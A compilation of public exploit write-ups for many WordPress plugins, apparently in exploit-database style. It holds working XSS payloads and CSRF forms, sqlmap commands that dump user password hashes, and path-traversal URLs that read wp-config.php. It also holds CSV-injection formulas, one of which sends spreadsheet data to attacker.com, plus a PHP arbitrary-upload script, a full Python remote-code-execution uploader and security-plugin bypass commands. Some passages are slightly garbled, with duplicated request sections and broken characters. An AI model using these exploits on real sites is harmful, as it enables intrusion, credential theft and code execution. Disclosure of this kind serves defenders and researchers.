* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/
# Description:
Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting
# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user:
===============================================================================================================
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database.
# Proof Of Concept:
Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS is triggered.
# Solution:
Upgrade Contact Form Entries to version 1.1.7
# Exploit Title: WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-fo...ck-tester/
# Version: 1.0.2
# Tested on: Windows 10
# CVE: CVE-2021-24247
1. Description:
The plugin settings are visible to all registered users in the dashboard.
A registered user can leave a payload in the plugin settings.
2. Proof of Concept:
- Register an account
- Navigate to the dashboard
- Go to CF7 Check Tester -> Settings
- Add a form
- Add a field to the form
- Put in a payload in either Field selector or Field value "><script>alert(1)</script>
- Save
Anyone who visits the settings page will execute the payload.
# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
# Date: 2022-02-07
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/contact-forms-builder/
# Version: 1.6.1
# Tested on: Windows 11
# CVE: N/A
1. Description:
This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1
Description
-----------
Plugin implements the following AJAX actions:
- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`
All of them call the function `contact_form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.
PoC
---
```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<select name="action">
<option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```
# Exploit Title : Contact Form 7 to Database Extension Wordpress Plugin CSV Injection
# Date: 23-03-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: None
# Software Link: https://wordpress.org/plugins/contact-form-7-to-database-extension
# Version: 2.10.32
# CVE : CVE-2018-9035
# Category : webapps
Description
===========
Contact Form 7 to Database Extension is a WordPress plugin with more than 400.000 active installations. Development is discontinued since 1 year. Version 2.10.32 (and possibly previous versions) are affected by a CSV Injection vulnerability.
Vulnerable part of code
=======================
File: contact-form-7-to-database-extension/ExportToCsvUtf8.php:135 prints value of column without checking if it contains a spreadsheet formula.
Impact
======
Arbitrary formulas can be injected into CSV/Excel files.
This can potentially lead to remote code execution at the client (DDE) or data leakage via maliciously injected hyperlinks.
Proof of Concept
============
In order to exploit this vulnerability, the attacker needs to insert an Excel formula into any of the contact form fields available. This will end up in the log, and if a WordPress administrator chooses to export this log as Excel/CSV file, the file will contain the formula. If he then opens the file, the formula will be calculated.
Example:
=cmd|'/C calc.exe'!Z0
or
=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")
Solution
========
The plugin should escape fields starting with '=' when it exports data to CSV or Excel formats.
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276
1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
=======================================================================
title: SQL Injection
product: WordPress Community Events Plugin
vulnerable version: 1.3.5 (and probably below)
fixed version: 1.4
CVE number: CVE-2015-3313
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/community-events/
found: 2015-01-07
by: Hannes Trunde
mail: hannes.trunde@gmail.com
twitter: @hannestrunde
=======================================================================
Plugin description:
-------------------
"The purpose of this plugin is to allow users to create a schedule of upcoming
events and display events for the next 7 days in an AJAX-driven box or
displaying a full list of upcoming events."
Source: https://wordpress.org/plugins/community-events/
Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.
Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind SQL injection attack can be
performed within the search function to obtain sensitive information from the
database. To exploit this vulnerability, there has to be at least one planned
event on the calendar.
Proof of concept:
-----------------
The following HTTP request to the Community Events full schedule returns the
event(s) planned in the specified year:
===============================================================================
http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1
===============================================================================
The following HTTP request returns a blank page, thus confirming the blind SQL
injection vulnerability:
===============================================================================
http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1
===============================================================================
Obtaining users and password hashes with sqlmap may look as follows (--string
parameter has to contain (part of) the name of the event, enabling sqlmap to
differentiate between true and false statements):
================================================================================
sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"
================================================================================
Contact timeline:
-----------------
2015-04-08: Contacting author via mail.
2015-04-09: Author replies and announces a fix within a week.
2015-04-12: Mail from author, stating that plugin has been updated.
2015-04-14: Posting information to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-18: Release of security advisory.
Solution:
---------
Update to the most recent plugin version.
Workaround:
-----------
See solution.
# Exploit Title: Wordpress Plugin Comments Import & Export < 2.0.4 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Bhushan B. Patil
# Software Link: https://wordpress.org/plugins/comments-import-export-woocommerce/
# Affected Version: 2.0.4 and before
# Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE: CVE-2018-11526
# 1. Application Description:
# Comments Import Export Plugin helps you to easily export and import Article and Product Comments in your store.
# 2. Technical Description:
# WordPress Comments Import & Export plugin version 2.0.4 and before are affected by the vulnerability Remote Command Execution
# using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with
# higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
# 3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When high privileged user logs into the application to export form data in CSV and opens the file.
Formula gets executed and calculator will get popped in his machine.
source: https://www.securityfocus.com/bid/57771/info
The CommentLuv plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CommentLuv versions 2.92.3 and prior are vulnerable.
<form action="http://www.example.com/wp-admin/admin-ajax.php" method="post" name="askform">
<input type="hidden" name="action" value="cl_ajax" />
<input type="hidden" name="do" value="fetch" />
<input type="hidden" name="url" value="1" />
<input type="hidden" name="_ajax_nonce" value='<script>alert(document.cookie);</script>'/>
<input type="submit" id="btn">
</form>
source: https://www.securityfocus.com/bid/51241/info
The Comment Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
# Date: 10.8.2020.
# Exploit Author: n1x_ [MS-WEB]
# Software Homepage: https://wordpress.org/plugins/wp-colorbox/
# Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip
# Product Version: 1.1.1
[Description]
# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library.
# Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability.
[Proof of Concept]
# 1. Authorization as user with privileges to write and publish posts
# 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post
# 3. The code is stored on the post
[Example payloads]
# Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert(document.cookie)</script>"]
# Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert('sampletext')</script>"]
[Response]
...
<a class="wp-colorbox-youtube" href="http://www.youtube.com/embed/example"><script>alert('sampletext')</script></a>
...
# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File
Disclosure Download
# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=
# Date: 02/12/2014
# Exploit Author: QK14 Team
# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/
# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/
# Version: 1.0.11
# http://wordpressa.quantika14.com/repository/index.php?id=14
Descripci�n:
Este plugin es vulnerable a File Disclosure Download.
Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de
configuraci�n config.php y extraer de �l los datos de acceso a la Base de
Datos.
POF:
localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php
source: https://www.securityfocus.com/bid/67469/info
The cnhk-slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
<?php
$uploadfile="file.php";
$ch = curl_init("
http://localhost/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('slideshow'=>"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
* Exploit Title: CMS Tree Page View [CSRF, Privilege Escalation]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://eskapism.se/
* Software Link: https://wordpress.org/plugins/cms-tree-page-view
* Version: 1.4
* Tested on: WordPress 4.8.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements AJAX action `cms_tpv_add_page` which calls back the
function `cms_tpv_add_page`. The later does not implement any anti-CSRF
controls or security checks.
Leveraging a CSRF attack an attacker could perform a Persistent XSS
attack if the victim has administrative rights (see PoC).
The AJAX action is a privileged one so it's only available for
registered users. Even so it doesn't implement any capabilities checks
so it's available to all users no matter the access level. This could
allow any registered user to create arbitrary posts no matter the access
level.
PoC
---
### CSRF -> Persistent XSS
In this PoC we exploit the `$_POST["page_titles"]` param to perform a
Persistent XSS attack.
```
<pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="cms_tpv_add_page">
<input type="text" name="type" value="after">
<input type="text" name="pageID" value="1">
<input type="text" name="post_type" value="page">
<input type="text" name="page_title" value="<script>alert(2)</script>">
<button type="submit" value="Submit">Submit</button>
</form>
```
### Create Arbitrary Posts
In this PoC we use a user with subscriber access to create arbitrary
pages. The post\_type is user defined so in the same manner we could
create any post type.
```
#!/usr/bin/env php
<?php
/*******************************************************************************
* CMS Tree Page View [Privilege Escalation]
*
* To install deps run `composer require wordfence/exkit`.
*
* @author Panagiotis Vagenas <pan.vagenas@gmail.com>
* @date 2017-08-09
******************************************************************************/
require_once __DIR__ . '/vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\WPAuthentication;
Config::get( 'url.base', null, true, 'Enter the site URL' )
|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
Cli::writeInfo( 'Logging in as subscriber...' );
WPAuthentication::logInAsUserRole( $s,
WPAuthentication::USER_ROLE_SUBSCRIBER );
Cli::writeInfo( 'Sending payload...' );
$postData = [
'action' => 'cms_tpv_add_page',
'type' => 'after',
'pageID' => '1',
'post_type' => 'page',
'page_title' => date('Y-m-d H:i:s'),
];
$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
if(!$r->success || $r->body == '0'){
ExitCodes::exitWithFailed('Failed to retrieve a valid response');
}
ExitCodes::exitWithSuccess('Exploitation successful');
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-23**: Vendor notified by email
3. **2018-01-06**: Patch released
source: https://www.securityfocus.com/bid/55241/info
The Cloudsafe365 plugin for WordPress is prone to a file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process. This may aid in further attacks.
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
source: https://www.securityfocus.com/bid/50778/info
ClickDesk Live Support plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ClickDesk Live Support 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss]
================================================================
CSRF/Stored XSS Vulnerability in ClickBank Ads V 1.7 Plugin
================================================================
. contents:: Table Of Content
Overview
========
* Title :CSRF and Stored XSS Vulnerability in ClickBank Ads Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/clickbank-ads-clickbank-widget/
* Severity: HIGH
* Version Affected: Version 1.7 and mostly prior to it
* Version Tested : Version 1.7
* version patched:
Description
===========
Vulnerable Parameter
--------------------
* Title:
About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
Vulnerability Class
===================
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Steps to Reproduce: (POC)
=========================
After installing the plugin
1. Goto Dashboard --> Setting --> ClickBank Ads --> Title
2. Insert this payload ## "><script>+-+-1-+-+alert(document.cookie)</script> ## Into above mention Vulnerable parameter Save settings and see XSS in action
3. Visit Click Ads settings page of this plugin anytime later and you can see the script executing as it is stored.
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
CSRF POC Code
=============
<html>
<body>
<form action="http://127.0.0.1/wp/wp-admin/options-general.php?page=clickbank-ads-clickbank-widget/clickbank-ads.php" method="POST">
<input type="hidden" name="cbwec[title]" value="">>><script>+-+-1-+-+alert(document.cookie)</script>" />
<input type="hidden" name="cbwec[name]" value="kaustubh" />
<input type="hidden" name="cbwec[keywordbytitle2]" value="Title" />
<input type="hidden" name="cbwec[keywords]" value="" />
<input type="hidden" name="cbwec[adformat]" value="1" />
<input type="hidden" name="cbwec[width2]" value="100%" />
<input type="hidden" name="cbwec[width]" value="100%" />
<input type="hidden" name="cbwec[height]2" value="220" />
<input type="hidden" name="cbwec[height]" value="220" />
<input type="hidden" name="cbwec[pos]" value="Top" />
<input type="hidden" name="cbwec[bordstyle]" value="1" />
<input type="hidden" name="cbwec[bordcolor]" value="CCCCCC" />
<input type="hidden" name="cbwec[linkcolor]" value="0000FF" />
<input type="hidden" name="cbwec[runplugin]" value="1" />
<input type="hidden" name="cbwec[homepage]" value="1" />
<input type="hidden" name="cbwec[onlypost]" value="1" />
<input type="hidden" name="cbwec_submit" value="Save »" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh (at) me (dot) com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
# Exploit Title: Wordpress church_admin Stored XSS
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Version: 0.800
# OSVDB ID : http://www.osvdb.org/show/osvdb/121304
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7999
# Category: webapps
1. Description
On the registration form the address field is not validated before returning it to the user.
Visiting the Directory page, will show the confirm window.
2. Proof of Concept
POST /wordpress/index.php/2015/05/21/church_admin-registration-form/
save=yes&church_admin_register=9d18cf0420&_wp_http_referer=%2Fwordpress%2Findex.php%2F2015%2F05%2F21%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5B%5D=test&mobile%5B%5D=%2B3670&people_type_id%5B%5D=1&email%5B%5D=test%40test.test&sex1=male&phone=%2B3670&address=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=51.50351129583287&lng=-0.148193359375&recaptcha_challenge_field=03AHJ_VuvBRBO1Vts65lchUe_H_c1AuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_N1YQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gt1jBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM01jnSseeg-thefo83fUZS9uuqrBQgqAZGYMmTWdgZ4xvrzXUdv5Zc76ktq-LWKPA&recaptcha_response_field=134
GET /wordpress/index.php/2015/05/21/church_admin-directory/
<header class="entry-header">
<h1 class="entry-title">church_admin directory</h1> </header><!-- .entry-header -->
<div class="entry-content">
<p><a href="http://localhost/wordpress/?download=addresslist&addresslist=d759d84e16&member_type_id=1,2">PDF version</a></p><form name="ca_search" action="" method="POST">
<p><label style="width:75px;float:left;">Search</label><input name="ca_search" type="text"/><input type="submit" value="Go"/><input type="hidden" name="ca_search_nonce" value="99de1bedec"/></p></form><div class="tablenav"><div class="tablenav-pages"><div class="pagination"></div>
</div></div>
<div class="church_admin_address" itemscope itemtype="http://schema.org/Person">
<div class="church_admin_name_address" >
<p><span itemprop="name"><strong>test test</strong></span></p>
<p><span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"><script>confirm()</script></span></p></div><!--church_admin_name_address-->
<div class="church_admin_phone_email">
<p> <a class="email" href="tel:+3670">+3670</a><br/>
<a class="email" href="tel:+3670"><span itemprop="telephone">+3670</span></a><br/>
<a class="email" itemprop="email" href="mailto:test@test.test">test@test.test</a><br/>
</p>
</div><!--church_admin_phone_email-->
3. Solution
Fixed in version 0.810.
source: https://www.securityfocus.com/bid/54329/info
The church_admin plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
church_admin plugin Version 0.33.4.5 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E
# Exploit Title: ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: N/A
# Date: 2020-05 -12
# Vendor Homepage: https://idangero.us/
# Software Link: https://github.com/idangerous/Plugins
# Version: <= 3.4
# Tested on: Ubuntu 18.04
# CVE: 2020-11530
Description:
A blind SQL injection vulnerability is present in Chop Slider 3
'/wp-content/plugins/chopslider/get_script/index.php':
$cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . '
WHERE chopslider_id =' . $id);
PoC:
Blind SQL injection:
GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or
(SELECT sleep(10))=6868
SQLMap using:
sqlmap -u '
http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111'
--level=5 --risk=3
sqlmap identified the following injection point(s) with a total of 17611
HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-3097 OR 2236=2236
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1111111111 OR SLEEP(5)
---
[08:55:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
source: https://www.securityfocus.com/bid/54635/info
The chenpress plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
# Exploit Author: Çlirim Emini
# Website: https://www.sentry.co.com
# Software Link: https://wordpress.org/plugins/chained-quiz/
# Version/s: 1.0.8 and below
# Patched Version: 1.0.9
# CVE : N/A
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112
# Vulnerability Description:
# WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated
# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.
# Technical details:
# Chained Quiz appears to be vulnerable to time-based SQL-Injection.
# The issue lies on the $answer backend variable.
# Privileges required: None
# Proof of Concept (PoC):
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T
# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7
# Date: 2015-01-19
# Exploit Author: Zakhar
# Vendor Homepage: https://wordpress.org/plugins/cforms2/
# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
# Version: 14.7
# Tested on: Wordpress 4.0
# CVE : 2014-9473
import os
import requests
import re
import base64
import sys
from lxml import etree
from optparse import OptionParser
def main():
print 'Cforms II File Upload + Remote Code Execution\n'
text = 'Test text'
text_mail = 'test@mail.com'
parser = OptionParser()
parser.add_option("-f", "--file", dest="file", help="file to upload", default = "itest.php", metavar="FILE")
parser.add_option("-i", "--max-iterations", dest="iterations", help="Numbe of fields to iterate", default = "10")
parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default = "10")
parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default = "")
parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default = "/wp-content/plugins/cforms2/")
parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/")
(opt, args) = parser.parse_args()
options = opt.__dict__
if not opt.url: # if url is not given
parser.error('URL not given')
if not opt.file:
parser.error('file not given')
filename = options["file"]
if os.path.isfile(filename) is not True:
print 'No such file '+filename
return 0
url = options['url']
home = options["home"]
i = options["iterations"]
n = options["number"]
b = options["brute"]
s = requests.Session()
r = s.get(url)
if r.status_code != requests.codes.ok:
print 'Error: website not found.'
return 0
tree = etree.HTML(r.text)
# get cforms id
if n is "":
for x in xrange(2,10):
for node in tree.xpath('//*[@id="cforms'+str(x)+'form"]'):
if node is not None:
n = str(x)
break
print 'Cforms form number is <'+n+'>'
hidden = ['cf_working'+n,'cf_failure'+n,'cf_codeerr'+n,'cf_customerr'+n,'cf_popup'+n]
fields = ['cf'+n+'_field_'+str(x) for x in xrange(1,int(i)+1)]
required = {'sendbutton'+n:'1'}
for f in fields:
for node in tree.xpath('//*[@id="' + f + '"]'):
if node is not None:
if 'fldrequired' in node.get('class'):
if 'fldemail' in node.get('class'):
required[f] = text_mail
else:
required[f] = text
for h in hidden:
for node in tree.xpath('//*[@id="' + h + '"]'):
if node is not None:
required[h] = node.get('value')
for node in tree.xpath('//*[@id="cforms_captcha'+n+'"]'):
if node is not None:
print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.'
return 0
files = {'cf_uploadfile'+n+'[]':('wow.php',open(filename))}
r = s.post(url,data=required,files=files)
if r.status_code != requests.codes.ok:
print 'Error: post error.'
print r.status_code
return 0
else:
url1 = url + home + 'noid-wow.php'
flag = 0
if s.get(url1).status_code != requests.codes.ok:
for l in xrange(1,int(b)):
url1 = url + home + str(l) + '-wow.php'
print url1
if s.get(url1).status_code == requests.codes.ok:
flag = 1
break
else:
flag = 1
if flag == 1:
print "Succes! Uploaded file: " + url1
else:
print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder"
main()
# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
[Vulnerabilities]
#1: Stop user enumeration bypass:
U can bypass user enumeration protection if u use Post method instead of Get.
curl http://localhost/ -d author=1
#2: Protect admin scripts bypass:
U can bypass admin scripts protection if u add one or more slashes to the uri.
curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'
#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
U can bypass this protection if u encode any character in the uri.
curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp
#4: Hide login URL bypass:
U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.
curl -I http://localhost/wp-%61dmin/
#5: Stop user enumeration via REST API bypass:
U can bypass if u insert /index.php/ between domain and rest route.
curl http:/localhost/index.php/wp-json/wp/v2/users/
#6: Disable REST API bypass:
Same above.
curl http:/localhost/index.php/wp-json/wp/v2/
--ed0x21son